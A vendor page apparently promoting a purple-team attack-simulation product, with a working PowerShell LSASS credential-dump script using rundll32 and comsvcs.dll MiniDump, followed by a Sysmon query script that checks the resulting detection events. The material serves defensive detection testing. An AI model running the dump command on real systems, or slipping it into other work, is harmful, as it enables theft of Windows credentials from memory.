Published: March 2026 | Last reviewed: March 22, 2026
// attack_simulations

Validate Your Defenses Before Adversaries Do

Threadlinqs ships 300+ attack simulation scenarios tied to real-world threats. Each simulation is a runnable PowerShell, Bash, or Python script that reproduces a technique observed in an actual campaign, so your team can validate detection rules and security controls in a controlled lab before an adversary exercises them for you.

300+
Simulations
3
Script Languages
249+
Threats Linked
465
MITRE Techniques

What Are Attack Simulations?

Attack simulations are controlled, reproducible scripts that emulate the observable behavior of real-world threat actors. Instead of guessing whether your EDR catches a particular technique, you run the simulation in a lab and watch what happens. If your detections fire, that rule covers the technique. If they do not, you know exactly which gap to fix.

Every simulation on Threadlinqs is linked to a specific threat report, so you can trace the simulation back to the original campaign, see the IOCs involved, and cross-reference the detection rules that should trigger.

Three Script Formats

Simulations are written for the environments where threats actually execute. Pick the format that matches your lab setup.

PowerShell
Windows-native simulation scripts targeting Active Directory, registry manipulation, WMI abuse, scheduled tasks, and credential harvesting techniques.
Windows Server / Workstation labs
Bash
Linux simulation scripts for cron persistence, SSH lateral movement, container escape, kernel exploitation, and log tampering scenarios.
Linux / macOS / container labs
Python
Cross-platform scripts for network-level simulations, C2 beacon emulation, DNS tunneling, data exfiltration, and API abuse scenarios.
Cross-platform / network labs

Sample Simulation

Below is a real PowerShell simulation from the platform that emulates LSASS credential dumping through the MiniDump export of comsvcs.dll (a living-off-the-land technique), mapped to MITRE ATT&CK T1003.001 (OS Credential Dumping: LSASS Memory).

# Simulation: LSASS Credential Dump via MiniDump API
# MITRE: T1003.001 (OS Credential Dumping: LSASS Memory)
# Threat: Mimikatz / Credential Access Campaign
# Run in an elevated lab environment only; opening lsass needs SeDebugPrivilege

# Bail out if not elevated, so a failed dump is not misread as a blocked one
$principal = [Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()
if (-not $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) {
    Write-Host "[-] Run this simulation from an elevated PowerShell session"
    return
}

$lsass    = Get-Process lsass
$dumpPath = "$env:TEMP\lsass_sim_$(Get-Date -Format yyyyMMdd).dmp"

# Use comsvcs.dll MiniDump (LOLBin technique). rundll32.exe is a GUI-subsystem
# binary, so PowerShell would not wait for it to finish; piping to Out-Null
# forces the wait so the file check below does not race the dump.
rundll32.exe C:\Windows\System32\comsvcs.dll, `
  MiniDump $lsass.Id $dumpPath full | Out-Null

if (Test-Path $dumpPath) {
    Write-Host "[+] Dump created: $dumpPath"
    Write-Host "[+] Expected detections:"
    Write-Host "    - Sysmon EventCode 10 (ProcessAccess: rundll32.exe -> lsass.exe)"
    Write-Host "    - Sysmon EventCode 1 (ProcessCreate: rundll32.exe with comsvcs.dll MiniDump in CommandLine)"
    Write-Host "    - Sysmon EventCode 11 (FileCreate) if your config logs file creation under $env:TEMP"
    Remove-Item $dumpPath -Force   # cleanup: never leave an LSASS dump on disk
} else {
    Write-Host "[-] No dump file - a control blocked the access (or the call failed; check Sysmon/EDR logs)"
}

After running the simulation, check whether your Sysmon EventCode 10 (ProcessAccess targeting lsass.exe) and comsvcs.dll command-line detection rules fired. Note that Event 10 is only recorded if your Sysmon configuration includes a ProcessAccess rule covering lsass.exe; a missing event may be a logging gap rather than a detection gap. The corresponding SPL/KQL/Sigma rules are available on the detection engineering page.
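One way to perform that check on the lab host itself, as an added example that is not part of the Threadlinqs platform or its scripts: it queries the local Sysmon operational log for the two events the simulation above should have produced and prints the fields the paired rules key on. It assumes Sysmon is installed with a configuration that records ProcessAccess (Event 10) for lsass.exe and ProcessCreate (Event 1), and that it runs elevated on the same host shortly after the simulation. The function names Get-SysmonEventData and Test-LsassDumpDetection and the 15-minute look-back window are choices made here, not platform conventions.

```powershell
# Added example (not a Threadlinqs script): verify locally that the LSASS MiniDump
# simulation produced the Sysmon events the paired detection rules key on.
# Assumes Sysmon is installed and its config records ProcessAccess (Event 10)
# for lsass.exe and ProcessCreate (Event 1). Run elevated on the lab host.

function Get-SysmonEventData {
    # Flatten a Sysmon EventRecord's <EventData> into a hashtable of Name -> value
    param([System.Diagnostics.Eventing.Reader.EventRecord]$Record)
    $xml  = [xml]$Record.ToXml()
    $data = @{ TimeCreated = $Record.TimeCreated; EventId = $Record.Id }
    foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
    return $data
}

function Test-LsassDumpDetection {
    param([int]$MinutesBack = 15)   # look-back window (assumption; adjust to your run)

    $log   = 'Microsoft-Windows-Sysmon/Operational'
    $since = (Get-Date).AddMinutes(-$MinutesBack)

    # Event 10: a handle opened on lsass.exe by rundll32.exe. GrantedAccess and
    # CallTrace are the fields most LSASS-access rules filter on.
    $access = @(Get-WinEvent -FilterHashtable @{ LogName = $log; Id = 10; StartTime = $since } -ErrorAction SilentlyContinue |
        ForEach-Object { Get-SysmonEventData $_ } |
        Where-Object { $_.TargetImage -like '*\lsass.exe' -and $_.SourceImage -like '*\rundll32.exe' })

    # Event 1: rundll32.exe launched with comsvcs.dll and MiniDump on the command line
    $create = @(Get-WinEvent -FilterHashtable @{ LogName = $log; Id = 1; StartTime = $since } -ErrorAction SilentlyContinue |
        ForEach-Object { Get-SysmonEventData $_ } |
        Where-Object { $_.Image -like '*\rundll32.exe' -and $_.CommandLine -match 'comsvcs\.dll.*MiniDump' })

    foreach ($e in $create) {
        Write-Host "[+] Event 1  $($e.TimeCreated): $($e.CommandLine)"
    }
    foreach ($e in $access) {
        Write-Host "[+] Event 10 $($e.TimeCreated): $($e.SourceImage) -> lsass.exe GrantedAccess=$($e.GrantedAccess)"
        Write-Host "             CallTrace: $($e.CallTrace)"
    }
    if ($create.Count -eq 0) {
        Write-Host "[-] No Event 1 for rundll32.exe + comsvcs.dll: the process-creation rule has nothing to match"
    }
    if ($access.Count -eq 0) {
        Write-Host "[-] No Event 10 for lsass.exe: confirm the Sysmon config has a ProcessAccess rule for lsass.exe"
    }

    # Return a summary object so the result can feed a per-technique coverage report
    [pscustomobject]@{
        Technique         = 'T1003.001'
        ProcessCreateSeen = $create.Count -gt 0
        ProcessAccessSeen = $access.Count -gt 0
        ProcessAccess     = $access
    }
}

Test-LsassDumpDetection -MinutesBack 15
```

Run it in the same elevated session right after the simulation. Both flags true means the telemetry your SPL/KQL/Sigma rules depend on is present; ProcessAccessSeen false with ProcessCreateSeen true usually points at the Sysmon ProcessAccess filter rather than at the detection rule.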

Purple Team Workflow

Simulations are designed for a closed-loop purple team workflow where red team execution is immediately validated against blue team detections.

Threat-Linked
Every simulation ties back to a specific threat report with IOCs, timeline, actor attribution, and detection rules.
MITRE Mapped
Simulations are tagged with MITRE ATT&CK technique IDs so you can validate coverage per technique.
Detection Pairing
Each simulation has corresponding detection rules in SPL, KQL, and Sigma that should fire on execution.
Safe by Default
Simulations emulate behavior without deploying actual malware. Cleanup steps are included in every script.
Copy-Paste Ready
One-click copy from the platform UI. Scripts are standalone with no external dependencies.
Severity Graded
Simulations inherit the severity rating of their parent threat, helping prioritize which controls to validate first.

Coverage by Tactic

Simulations span every MITRE ATT&CK tactic, from initial access through impact, with the most depth in the techniques most exploited by active threat actors.

// author
Threadlinqs Intel Team
Security Engineer at Threadlinqs Intelligence. Researching active threats, building detection rules, and mapping adversary tradecraft across SPL, KQL, and Sigma.
medium.com/@hatim.bakkali10

Validate your security controls against 300+ real-world attack scenarios.

[ explore_simulations ] view pricing